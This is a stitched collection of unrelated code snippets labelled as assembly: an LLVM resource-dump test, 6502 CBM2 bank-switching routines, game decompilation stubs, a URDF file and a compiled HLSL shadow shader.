// CHECK-NEXT: 0220: CBCBCBA7 A7A7FFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0230: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0240: FFFFFFFF BDBDBDF7 F7F7EFEF EFD0D0D0 |................|
// CHECK-NEXT: 0250: AFAFAFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0260: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0270: FFFFFFFF C1C1C1F7 F7F7D5D5 D5B6B6B6 |................|
// CHECK-NEXT: 0280: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0290: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 02A0: FFFFFFFF C4C4C4D9 D9D9BEBE BEFFFFFF |................|
// CHECK-NEXT: 02B0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 02C0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 02D0: FFFFFFFF C8C8C8C5 C5C5FFFF FFFFFFFF |................|
// CHECK-NEXT: 02E0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 02F0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0300: FFFFFFFF CBCBCBFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0310: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0320: FFFFFFFF FFFFFFFF |........|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 2
// CHECK-NEXT: Resource name (string): OKAY
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x30
// CHECK-NEXT: Language ID: 1033
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 808
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 28000000 10000000 10000000 01001800 |(...............|
// CHECK-NEXT: 0010: 00000000 00030000 C40E0000 C40E0000 |................|
// (...)
// CHECK-DAG: 0310: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0320: FFFFFFFF FFFFFFFF |........|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 4
// CHECK-NEXT: Resource name (int): 14432
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x1030
// CHECK-NEXT: Language ID: 2052
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 46
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 00000000 00006400 79007500 00000000 |......d.y.u.....|
// CHECK-NEXT: 0010: 65007300 68006100 6C006100 00008000 |e.s.h.a.l.a.....|
// CHECK-NEXT: 0020: 66006B00 61006F00 79006100 0000 |f.k.a.o.y.a...|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 5
// CHECK-NEXT: Resource name (string): TESTDIALOG
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x1030
// CHECK-NEXT: Language ID: 1033
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 108
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 0000C080 00000000 02000A00 0A00C800 |................|
// CHECK-NEXT: 0010: 2C010000 00005400 65007300 74000000 |,.....T.e.s.t...|
// CHECK-NEXT: 0020: 01000250 00000000 0A000A00 E6000E00 |...P............|
// CHECK-NEXT: 0030: 0100FFFF 82004300 6F006E00 74006900 |......C.o.n.t.i.|
// CHECK-NEXT: 0040: 6E007500 65003A00 00000000 00000150 |n.u.e.:........P|
// CHECK-NEXT: 0050: 00000000 42008600 A1000D00 0200FFFF |....B...........|
// CHECK-NEXT: 0060: 80002600 4F004B00 00000000 |..&.O.K.....|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 9
// CHECK-NEXT: Resource name (int): 12
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x30
// CHECK-NEXT: Language ID: 1033
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 24
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 11005800 A4000000 0D004800 2E160000 |..X.......H.....|
// CHECK-NEXT: 0010: 82001200 BC010000 |........|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 4
// CHECK-NEXT: Resource name (string): "EAT"
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x1030
// CHECK-NEXT: Language ID: 3081
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 48
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 00000000 00006400 66006900 73006800 |......d.f.i.s.h.|
// CHECK-NEXT: 0010: 00000000 65007300 61006C00 61006400 |....e.s.a.l.a.d.|
// CHECK-NEXT: 0020: 00008000 66006400 75006300 6B000000 |....f.d.u.c.k...|
// CHECK-NEXT: )
| {
"language": "Assembly"
} |
.extern MterpIputObject
EXPORT_PC
daddu a0, rFP, OFF_FP_SHADOWFRAME
move a1, rPC
move a2, rINST
move a3, rSELF
jal MterpIputObject
beqzc v0, MterpException
FETCH_ADVANCE_INST 2 # advance rPC, load rINST
GET_INST_OPCODE v0 # extract opcode from rINST
GOTO_OPCODE v0 # jump to next instruction
| {
"language": "Assembly"
} |
.PAG 'TXRAM'
; 02/28/83 BP
; TRANSFER EXEC ROUTINES FOR CBM2
; RAM ROUTINE TO SOFT LOAD
E6509 =$0000 ;6509 EXEC REGISTER
I6509 =$0001 ;6509 IND REGISTER
IPOINT = $00AC
STACKP = $01FF
EXSUB =$FEAB
*=EXSUB-78
TXIRQ ;ENTRY FOR IRQ/BRK RAM SEGMENT
STA IPOINT ;SAVE .A IN TMP
PLA ;REAL .P
PHA ;RESTORE .P FOR RTI
STA IPOINT+1 ;TMP .P
LDA I6509 ;SAVE I6509
PHA
LDA IPOINT+1 ;RESTORE .P IN .A
JSR TXIRQ2 ;SAVE THIS RTS ADDR
STA IPOINT ;SAVE .A IN TMP
PLA ;SO WE CAN RESTORE I6509
STA I6509
LDA IPOINT ;RESTORE .A FROM TMP
RTI ;NOW WE CAN RTI
;
TXNMI ;ENTRY FOR NMI RAM SEGMENT
PHA ;SAVE .A
LDA IPOINT ;SAVE IPOINT
PHA
LDA IPOINT+1
PHA
LDA STACKP ;SAVE STACKP
PHA
LDA I6509 ;SAVE I6509
PHA
JSR EXNMI ;CALL NMI AS SUB IN SEG F
PLA
STA I6509 ;RESTORE I6509
PLA
STA STACKP ;RESTORE STACKP
PLA
STA IPOINT+1 ;RESTORE IPOINT
PLA
STA IPOINT ;RESTORE .A
RTI
TXIRQ2 AND #$10 ;TEST FOR BRK OR IRQ
BNE EXBRKX ;IT'S A BRK
LDA IPOINT ;RESTORE .A
JMP EXIRQ ;GO IRQ
EXBRKX LDA IPOINT ;RESTORE .A
JMP EXBRK ;GO BRK
EXSUBF PHP ;SAVE STATUS
PHA ;SAVE.A
LDA #$0F ;SYSTEM SEGMENT
STA I6509 ;SET UP IND POINTER
PLA ;RESTORE .A
PLP ;RESTORE STATUS
JMP EXSUB
*=EXSUB
PHP ;SAVE STATUS
SEI
PHA ;.A
TXA
PHA ;.X
TYA
PHA ;.Y
JSR IPINIT ;INIT IPOINT AND LOAD STACK FROM XFER SEG
TAY ;.Y IS XFER SEG STACK POINTER
LDA E6509 ;PUSH RETURN SEGMENT TO USER STACK
JSR PUTAS ;PUSH .A TO OTHER STACK
LDA #<EXCRT2 ;XFER SEG RTS ROUTN
LDX #>EXCRT2 ;XFER SEG RTS ROUTN
JSR PUTAXS ;PUT .A.X TO XFER SEG STACK
TSX
LDA $0105,X ;.SP +5 IS ACTUAL ROUTN ADDR LO
SEC
SBC #03 ;-3 FOR JSR TO THIS ROUTN
PHA ;SAVE .A
LDA $0106,X ;HI ADDR
SBC #00
TAX ;.X HI
PLA ;RESTORE .A LO
JSR PUTAXS ;SAVE .A.X ONTO XFER SEG STACK
TYA ;XFER SEG STACK POINTER
EXCOMM SEC
SBC #04 ;4 BYTES .Y.X.A.P
STA STACKP ;XFER SEG NEW STACK POINTER TEMP STORAGE
TAY ;USE THIS AS NEW POINTER ALSO
LDX #04 ;4 BYTES .Y.X.A.P
EXSU10 PLA
INY
STA (IPOINT),Y ;PUSH REGS FROM THIS STACK TO XFER SEG STACK
DEX
BNE EXSU10
LDY STACKP ;RESTORE .Y AS STACK POINTER FOR XFER SEG
LDA #<EXPUL2 ;PULL REGS AND RTS ROUTN
LDX #>EXPUL2 ;.HI PRENDN ROUTN IN XFER SEG
JSR PUTAXS ;PUT .A.X ON XFER SEG STACK
PLA ;FIX STACK
PLA ;FIX STACK
EXGBYE TSX
STX STACKP ;SAVE CURRENT STACK POINTER THIS SEG
TYA ;.Y IS STACK POINTER FOR XFER SEG
TAX
TXS ;NEW STACK FOR XFER SEG
LDA I6509 ;XFER SEG #
JMP GBYE ;GOOD BYE
;
NOP ;RETURNS HERE IF RTI
EXCRTS PHP ;.P
PHP ;.P
PHA ;.A
TXA
PHA ;.X
TYA
PHA ;.Y
TSX
LDA $0106,X ;.SP +6 IS RETURN SEG
STA I6509 ;RESTORE I6509 TO RETURN SEG
JSR IPINIT ;INIT IPOINT AND LOAD STACK FROM XFER SEG
JMP EXCOMM
;
IPINIT LDY #01
STY IPOINT+1
DEY
STY IPOINT ;IPOINT=$0100
DEY ;.Y =$FF
LDA (IPOINT),Y ;LOAD STACK POINTER FROM $001FF
RTS
PUTAXS PHA ;SAVE .A
TXA
STA (IPOINT),Y ;.X HI
DEY
PLA
PUTAS STA (IPOINT),Y ;.A LO
DEY
RTS
;
EXPULL PLA
TAY ;.Y
PLA
TAX ;.X
PLA ;.A
PLP ;.P
RTS ;.P
;
EXNMI JSR EXSUBF ;EX NMI IN SEG F
NOP ;MAKE ROOM
EXBRK JSR EXSUBF ;EX BRK IN SEG F
EXIRQ JSR EXSUBF ;EX IRQ IN SEG F
;
EXCRT2=EXCRTS-1
EXPUL2=EXPULL-1
* =$FF6F
.PAG 'JUMP TABLE/VECTORS'
VRESET JSR EXSUBF ;POWER-ON/OFF VECTOR RESET
IPCGO JSR EXSUBF ;LOOP FOR IPC SYSTEM
FUNKEY JSR EXSUBF ;FUNCTION KEY VECTOR
IPRQST JSR EXSUBF ;SEND IPC REQUEST
IOINIT JSR EXSUBF ;I/O INITIALIZATION
CINT JSR EXSUBF ;SCREEN INITIALIZATION
ALOCAT JSR EXSUBF ;ALLOCATION ROUTINE
VECTOR JSR EXSUBF ;READ/SET I/O VECTORS
RESTOR JSR EXSUBF ;RESTORE I/O VECTORS
LKUPSA JSR EXSUBF ;MATCH SA--RETURN SA,FA
LKUPLA JSR EXSUBF ;MATCH LA--RETURN SA,FA
SETMSG JSR EXSUBF ;CONTROL O.S. MESSAGES
SECND JSR EXSUBF ;SEND SA AFTER LISTEN
TKSA JSR EXSUBF ;SEND SA AFTER TALK
MEMTOP JSR EXSUBF ;SET/READ TOP OF MEMORY
MEMBOT JSR EXSUBF ;SET/READ BOTTOM OF MEMORY
SCNKEY JSR EXSUBF ;SCAN KEYBOARD
SETTMO JSR EXSUBF ;SET TIMEOUT IN IEEE
ACPTR JSR EXSUBF ;HANDSHAKE IEEE BYTE IN
CIOUT JSR EXSUBF ;HANDSHAKE IEEE BYTE OUT
UNTLK JSR EXSUBF ;SEND UNTALK OUT IEEE
UNLSN JSR EXSUBF ;SEND UNLISTEN OUT IEEE
LISTN JSR EXSUBF ;SEND LISTEN OUT IEEE
TALK JSR EXSUBF ;SEND TALK OUT IEEE
READST JSR EXSUBF ;READ/WRITE I/O STATUS BYTE
SETLFS JSR EXSUBF ;SET LA, FA, SA
SETNAM JSR EXSUBF ;SET LENGTH AND FN ADR
OPEN JSR EXSUBF ;OPEN LOGICAL FILE/TRANSMIT COMMAND
CLOSE JSR EXSUBF ;CLOSE LOGICAL FILE
CHKIN JSR EXSUBF ;OPEN CHANNEL IN
CKOUT JSR EXSUBF ;OPEN CHANNEL OUT
CLRCH JSR EXSUBF ;CLOSE I/O CHANNEL
BASIN JSR EXSUBF ;INPUT FROM CHANNEL
BSOUT JSR EXSUBF ;OUTPUT TO CHANNEL
LOAD JSR EXSUBF ;LOAD FROM FILE
SAVE JSR EXSUBF ;SAVE TO FILE
SETTIM JSR EXSUBF ;SET INTERNAL CLOCK
RDTIM JSR EXSUBF ;READ INTERNAL CLOCK
STOP JSR EXSUBF ;SCAN STOP KEY
GETIN JSR EXSUBF ;GET CHAR FROM Q
CLALL JSR EXSUBF ;CLOSE ALL FILES
UDTIM JSR EXSUBF ;INCREMENT CLOCK
SCRORG JSR EXSUBF ;SCREEN ORG
PLOT JSR EXSUBF ;READ/SET X,Y COORD
IOBASE JSR EXSUBF ;RETURN I/O BASE
.SKI 5
GBYE STA E6509 ;GOODBYE...
RTS
*=$FFFA
.WOR TXNMI ;TRANSFER NMI
.BYT 'BP' ;BENNY PRUDEN
.WOR TXIRQ ;TRANSFER IRQ
.END
| {
"language": "Assembly"
} |
include <config.scad>
use <GDMUtils.scad>
use <joiners.scad>
use <rrd_graphic_lcd_case.scad>
module rrd_graphic_lcd_cover_parts() { // make me
rrd_graphic_lcd_case_top();
}
rrd_graphic_lcd_cover_parts();
// vim: noexpandtab tabstop=4 shiftwidth=4 softtabstop=4 nowrap
| {
"language": "Assembly"
} |
#include "z_en_sb.h"
#define ROOM 0x00
#define FLAGS 0x00000005
void EnSb_Init(EnSb* this, GlobalContext* globalCtx);
void EnSb_Destroy(EnSb* this, GlobalContext* globalCtx);
void EnSb_Update(EnSb* this, GlobalContext* globalCtx);
void EnSb_Draw(EnSb* this, GlobalContext* globalCtx);
/*
const ActorInit En_Sb_InitVars =
{
ACTOR_EN_SB,
ACTORTYPE_ENEMY,
ROOM,
FLAGS,
OBJECT_SB,
sizeof(EnSb),
(ActorFunc)EnSb_Init,
(ActorFunc)EnSb_Destroy,
(ActorFunc)EnSb_Update,
(ActorFunc)EnSb_Draw,
};
*/
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/EnSb_Init.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/EnSb_Destroy.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF790C.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF79BC.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7A34.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7AB0.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7B24.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7BCC.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7C44.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7D48.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7DC8.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7E90.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7F44.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF803C.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF80E4.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF8224.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF828C.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF82F0.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF832C.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF8368.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF8388.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF83D4.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/EnSb_Update.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF8828.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/EnSb_Draw.s")
| {
"language": "Assembly"
} |
<robot name="blob523">
<link name="random_obj_523">
<contact>
<lateral_friction value="1.0"/>
<rolling_friction value="0.0"/>
<inertia_scaling value="3.0"/>
<contact_cfm value="0.0"/>
<contact_erp value="1.0"/>
</contact>
<inertial>
<origin rpy="0 0 0" xyz="0 0 0"/>
<mass value="0.1"/>
<inertia ixx="1" ixy="0" ixz="0" iyy="1" iyz="0" izz="0"/>
</inertial>
<visual>
<origin rpy="0 0 0" xyz="0 0 0"/>
<geometry>
<mesh filename="523.obj" scale="0.015 0.015 0.015"/>
</geometry>
<material name="blockmat">
<color rgba="0.26 0.01 0.06 1"/>
</material>
</visual>
<collision>
<origin rpy="0 0 0" xyz="0 0 0"/>
<geometry>
<mesh filename="523.obj" scale="0.015 0.015 0.015"/>
</geometry>
</collision>
</link>
</robot>
| {
"language": "Assembly"
} |
//=== SystemZMachineFunctionInfo.cpp - SystemZ machine function info ------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#include "SystemZMachineFunctionInfo.h"
using namespace llvm;
// pin vtable to this file
void SystemZMachineFunctionInfo::anchor() {}
| {
"language": "Assembly"
} |
#if 0
//
// Generated by Microsoft (R) HLSL Shader Compiler 10.0.10011.16384
//
//
// Buffer Definitions:
//
// cbuffer CB_SHADOWS_DATA
// {
//
// struct ShadowsData
// {
//
// struct Camera
// {
//
// float4x4 m_View; // Offset: 0
// float4x4 m_Projection; // Offset: 64
// float4x4 m_ViewProjection; // Offset: 128
// float4x4 m_View_Inv; // Offset: 192
// float4x4 m_Projection_Inv; // Offset: 256
// float4x4 m_ViewProjection_Inv;// Offset: 320
// float3 m_Position; // Offset: 384
// float m_Fov; // Offset: 396
// float3 m_Direction; // Offset: 400
// float m_FarPlane; // Offset: 412
// float3 m_Right; // Offset: 416
// float m_NearPlane; // Offset: 428
// float3 m_Up; // Offset: 432
// float m_Aspect; // Offset: 444
// float4 m_Color; // Offset: 448
//
// } m_Viewer; // Offset: 0
// float2 m_Size; // Offset: 464
// float2 m_SizeInv; // Offset: 472
//
// struct ShadowsLightData
// {
//
// struct Camera
// {
//
// float4x4 m_View; // Offset: 480
// float4x4 m_Projection; // Offset: 544
// float4x4 m_ViewProjection;// Offset: 608
// float4x4 m_View_Inv; // Offset: 672
// float4x4 m_Projection_Inv;// Offset: 736
// float4x4 m_ViewProjection_Inv;// Offset: 800
// float3 m_Position; // Offset: 864
// float m_Fov; // Offset: 876
// float3 m_Direction; // Offset: 880
// float m_FarPlane; // Offset: 892
// float3 m_Right; // Offset: 896
// float m_NearPlane; // Offset: 908
// float3 m_Up; // Offset: 912
// float m_Aspect; // Offset: 924
// float4 m_Color; // Offset: 928
//
// } m_Camera; // Offset: 480
// float2 m_Size; // Offset: 944
// float2 m_SizeInv; // Offset: 952
// float4 m_Region; // Offset: 960
// float4 m_Weight; // Offset: 976
// float m_SunArea; // Offset: 992
// float m_DepthTestOffset; // Offset: 996
// float m_NormalOffsetScale; // Offset: 1000
// uint m_ArraySlice; // Offset: 1004
//
// } m_Light[6]; // Offset: 480
// uint m_ActiveLightCount; // Offset: 3648
// float3 pad3; // Offset: 3652
//
// } g_cbShadowsData; // Offset: 0 Size: 3664
//
// }
//
//
// Resource Bindings:
//
// Name Type Format Dim HLSL Bind Count
// ------------------------------ ---------- ------- ----------- -------------- ------
// g_scsLinear sampler_c NA NA s3 1
// g_t2dDepth texture float 2d t0 1
// g_t2dShadow texture float 2d t2 1
// CB_SHADOWS_DATA cbuffer NA NA cb0 1
//
//
//
// Input signature:
//
// Name Index Mask Register SysValue Format Used
// -------------------- ----- ------ -------- -------- ------- ------
// SV_POSITION 0 xyzw 0 POS float xy
// TEXCOORD 0 xy 1 NONE float
//
//
// Output signature:
//
// Name Index Mask Register SysValue Format Used
// -------------------- ----- ------ -------- -------- ------- ------
// SV_Target 0 xyzw 0 TARGET float xyzw
//
ps_5_0
dcl_globalFlags refactoringAllowed
dcl_constantbuffer CB0[229], dynamicIndexed
dcl_sampler s3, mode_comparison
dcl_resource_texture2d (float,float,float,float) t0
dcl_resource_texture2d (float,float,float,float) t2
dcl_input_ps_siv linear noperspective v0.xy, position
dcl_output o0.xyzw
dcl_temps 6
mul r0.x, v0.x, cb0[29].z
mul r0.y, v0.y, -cb0[29].w
add r0.xy, r0.xyxx, l(-0.500000, 0.500000, 0.000000, 0.000000)
add r0.xy, r0.xyxx, r0.xyxx
ftoi r1.xy, v0.xyxx
mov r1.zw, l(0,0,0,0)
ld_indexable(texture2d)(float,float,float,float) r0.z, r1.xyzw, t0.yzxw
mov r0.w, l(1.000000)
dp4 r1.x, r0.xyzw, cb0[20].xyzw
dp4 r1.y, r0.xyzw, cb0[21].xyzw
dp4 r1.z, r0.xyzw, cb0[22].xyzw
dp4 r1.w, r0.xyzw, cb0[23].xyzw
div r0.xyzw, r1.xyzw, r1.wwww
mov r1.w, r0.w
mov r1.xyz, r0.xyzx
mov r0.w, l(-1)
mov r2.xy, l(0,1.000000,0,0)
loop
ult r2.z, r2.x, cb0[228].x
and r2.z, r0.w, r2.z
breakc_z r2.z
imul null, r2.z, r2.x, l(33)
dp4 r3.x, r1.xyzw, cb0[r2.z + 38].xyzw
dp4 r3.y, r1.xyzw, cb0[r2.z + 39].xyzw
dp4 r3.z, r1.xyzw, cb0[r2.z + 40].xyzw
dp4 r2.w, r1.xyzw, cb0[r2.z + 41].xyzw
div r3.xyz, r3.xyzx, r2.wwww
mad r4.xy, r3.xyxx, l(0.500000, 0.500000, 0.000000, 0.000000), l(0.500000, 0.500000, 0.000000, 0.000000)
add r2.w, -r4.y, l(1.000000)
ge r3.x, r4.x, l(0.000000)
ge r3.y, l(1.000000), r4.x
and r3.x, r3.y, r3.x
ge r3.y, r2.w, l(0.000000)
and r3.x, r3.y, r3.x
ge r2.w, l(1.000000), r2.w
and r2.w, r2.w, r3.x
ge r3.x, r3.z, l(0.000000)
and r2.w, r2.w, r3.x
ge r3.x, l(1.000000), r3.z
and r2.w, r2.w, r3.x
if_nz r2.w
add r3.xy, -cb0[r2.z + 60].xyxx, cb0[r2.z + 60].zwzz
add r4.z, -r4.y, l(1.000000)
mad r4.xy, r4.xzxx, r3.xyxx, cb0[r2.z + 60].xyxx
add r2.w, r3.z, -cb0[r2.z + 62].y
mul r3.xy, r3.xyxx, cb0[r2.z + 59].zwzz
mad r5.xyzw, r3.xyxy, l(1.587556, 4.796667, 0.435970, 3.288376), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r2.z, r5.xyxx, t2.xxxx, s3, r2.w
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mul r3.z, r3.z, l(0.736643)
mad r2.z, r2.z, l(0.492077), r3.z
mad r5.xyzw, r3.xyxy, l(-0.864387, 4.575846, 3.292378, 5.138325), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.547509), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.355403), r2.z
mad r5.xyzw, r3.xyxy, l(2.312524, 2.769281, 4.225343, 3.604556), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.696579), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.424500), r2.z
mad r5.xyzw, r3.xyxy, l(0.502956, 6.027727, 0.550159, 1.327755), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.361935), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.944237), r2.z
mad r5.xyzw, r3.xyxy, l(3.755680, 0.434709, 4.400129, 1.975965), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.672295), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.523999), r2.z
mad r5.xyzw, r3.xyxy, l(5.723944, 3.047444, -2.986023, 3.579002), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.310967), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.546900), r2.z
mad r5.xyzw, r3.xyxy, l(-2.205332, 5.931354, -2.094388, 1.725067), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.328787), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.815048), r2.z
mad r5.xyzw, r3.xyxy, l(1.600374, -0.851189, -1.565537, -0.936008), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.912771), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.911725), r2.z
mad r5.xyzw, r3.xyxy, l(-0.062289, -0.300187, -3.644919, -0.090210), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.997393), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.691242), r2.z
mad r5.xyzw, r3.xyxy, l(-4.533929, 2.319456, -5.902076, -0.327370), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.486531), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.378855), r2.z
mad r5.xyzw, r3.xyxy, l(-4.387158, -1.592991, -1.661510, -2.520221), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.546002), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.776379), r2.z
mad r5.xyzw, r3.xyxy, l(-6.255653, 1.339290, 0.047479, -1.925659), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.320825), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.902066), r2.z
mad r5.xyzw, r3.xyxy, l(2.232487, -2.384052, -4.229948, -3.533641), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.743546), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.430046), r2.z
mad r5.xyzw, r3.xyxy, l(-5.739054, -2.659190, -1.075142, -4.961121), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.329120), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.488803), r2.z
mad r5.xyzw, r3.xyxy, l(-3.235412, -5.090914, 5.271102, -2.455229), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
